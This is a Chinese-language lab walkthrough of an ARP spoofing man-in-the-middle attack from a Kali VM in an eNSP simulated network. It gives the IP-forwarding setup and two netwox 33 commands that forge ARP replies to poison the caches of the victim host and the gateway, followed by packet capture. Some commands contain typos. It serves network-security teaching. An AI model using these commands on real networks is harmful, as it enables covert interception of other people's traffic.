一、实验拓扑
二、实验要求
网关发送给主机A的消息会被攻击者接受,再转发给主机A;同理。主机A发送给网关的消息也会被攻击者接收,再转发给网关。相当于,攻击者B成为了主机A和网关C通信的**“中间者”**。
三、实验环境准备
kali-Linux虚拟机
ensp实验环境
四、实验步骤
1、配置相应的IP地址
受害者主机A:172.24.8.130/24
网关:172.24.8.2/24
攻击者kali:172.24.8.129/24
外网主机:10.1.1.100/24
2、首先测试一下各个设备之间的连通性
受害者主机A与攻击者kali之间:
受害者主机A与外网主机B之间:
3、使用arp -a查看一下受害者A上和路由器上的的arp缓存列表
4、在kali上进行攻击
1)开启网卡转发功能
vim /etc/sysctl.conf //编辑sysctl.conf
Net.ipv4.ip_forward = 1 //设置为1
Sysctl -p /etc/sysctl.conf //立即生效不需要重启
Cat /etc/sys/net/ipv4/ipv4_forward //查看值是否为1,为1表示修改完成,为0表示没有修改。
开启了网卡转发功能后,受害者主机发送到目标主机的数据包会经过攻击者转发出去,这样攻击者就可以监听他们之间的数据了。
同时还需要在kali上写一条到10.1.1.100的静态路由,保证kali可以到外网
sudo route add -net 10.1.1.0 netmask 255.255.255.0 gw 172.24.8.2
2)使用netwox 33 号工具,对主机A收到的网关的ARPREP报文修改;
sudo netwox 33 -d Eth0 -a 00:0C:29:93:FA:E2 -b 54:89:98:08:60:D4 -c 2054 -e 2 -f 00:0C:29:93:FA:E2 -g 172.24.8.2 -h 54:89:98:08:60:D4 -i 172.24.8.130
sudo netwox 33 -d Eth0 -a 00:0C:29:93:FA:E2 -b 00:e0:fc:66:4a:b3 -c 2054 -e 2 -f 00:0C:29:93:FA:E2 -g 172.24.8.130 -h 00:e0:fc:66:4a:b3 -i 172.24.8.2
3)查看受害者主机A的ARP缓存列表,可以看到网关的MAC地址已经变成了攻击者的MAC
查看路由器上缓存列表
5、进行抓包测试
可以在攻击者kali上面的Eth0上抓包。
可以观察到他们之间的通信数据会经过攻击者。